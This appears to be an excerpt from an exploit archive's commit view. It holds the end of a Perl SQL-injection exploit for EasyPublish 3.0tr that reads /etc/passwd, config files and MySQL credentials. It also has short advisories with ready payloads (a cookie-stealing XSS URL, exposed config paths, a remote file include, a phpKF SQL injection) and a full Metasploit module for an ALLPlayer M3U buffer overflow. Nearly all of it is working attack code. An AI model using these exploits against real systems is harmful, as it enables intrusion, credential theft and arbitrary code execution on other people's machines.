if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
print "\n Username: ".$name."\n\n";
print " Password: " .$password."\n\n";
}
#XPL2
sub xpl2()
{
print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd";
print "\n Enter File Address :";
$fil3 = <stdin>;
$vul = "/staticpages/easypublish/index.php?PageSection=0&table=edp_News&page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),3,4,1,5+FROM+edp_puusers/*";
$requestpage = $url.$vul;
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
open (FILE, ">".source.".txt");
print FILE $name;
close (FILE);
print " File Save In source.txt\n";
print "";
}
#XPL2 END
#Starting;
print "
****************************************************
* EasyPublish 3.0tr Exploit *
****************************************************
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani *
*My Official Website : http://fereidani.ir *
****************************************************
* Mod Options : *
* Mod 1 : Find mysql username and root password *
* Mod 2 : Save PHP config source in your system *
****************************************************";
print "\n \n Enter Mod : ";
$mod=<stdin>;
if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! \n Exploit Failed !"; };
if ($mod=="1") { xpl1(); };
if ($mod=="2") { xpl2(); };

7
platforms/php/webapps/32090.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30309/info
Maran PHP Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/comments.php?id=%3E%3C%3E%27%3Cscript%3Ealert(document.cookie)%3C/script%3E

12
platforms/php/webapps/32091.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/30310/info
MyBlog is prone to multiple information-disclosure vulnerabilities because the application fails to properly restrict access to sensitive files.
An unprivileged attacker may exploit these issues to obtain sensitive information.
MyBlog 0.9.8 is vulnerable; other versions may also be affected.
http://www.example.com/config/mysqlconnection.inc
http://www.example.com/config/mysqlconnection%20-%20Copy.inc
http://www.example.com/admin/setup.php
http://www.example.com/config/settings.inc

9
platforms/php/webapps/32092.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30312/info
Flip is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Flip 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/config.php?incpath=[SHELL]

8
platforms/php/webapps/32093.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/30318/info
phpKF is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/lab/phpkf/yonetim/forum_duzen.php?kip=forum_duzenle&fno='+union+select+kullanici_adi,concat(database(),0x3a,version()),sifre+from+phpkf_kullanicilar/*

107
platforms/windows/local/32074.rb Executable file
View file

@ -0,0 +1,107 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'ALLPlayer M3U Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
ALLPlayer 2.8.1, caused by a long string in a playlist entry.
By persuading the victim to open a specially-crafted .M3U file, a
remote attacker could execute arbitrary code on the system or cause
the application to crash. This module has been tested successfully on
Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom', # Vulnerability discovery
'Mike Czumak', # Original exploit
'Gabor Seljan' # Metasploit module
],
'References' =>
[
[ 'BID', '62926' ],
[ 'BID', '63896' ],
[ 'EDB', '28855' ],
[ 'EDB', '29549' ],
[ 'EDB', '29798' ],
[ 'EDB', '32041' ],
[ 'OSVDB', '98283' ],
[ 'URL', 'http://www.allplayer.org/' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'process'
},
'Platform' => 'win',
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f",
'Space' => 3060,
'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'EAX'
}
},
'Targets' =>
[
[ ' ALLPlayer 2.8.1 / Windows 7 SP1',
{
'Offset' => 301,
'Ret' => "\x50\x45", # POP POP RET from ALLPlayer.exe
'Nop' => "\x6e" # ADD BYTE PTR DS:[ESI],CH
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 09 2013',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])
],
self.class)
end
def exploit
nop = target['Nop']
sploit = rand_text_alpha_upper(target['Offset'])
sploit << "\x61\x50" # POPAD
sploit << target.ret
sploit << "\x53" # PUSH EBX
sploit << nop
sploit << "\x58" # POP EAX
sploit << nop
sploit << "\x05\x14\x11" # ADD EAX,0x11001400
sploit << nop
sploit << "\x2d\x13\x11" # SUB EAX,0x11001300
sploit << nop
sploit << "\x50" # PUSH EAX
sploit << nop
sploit << "\xc3" # RET
sploit << nop * 109
sploit << payload.encoded
sploit << rand_text_alpha_upper(10000) # Generate exception
# Create the file
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create("http://" + sploit)
end
end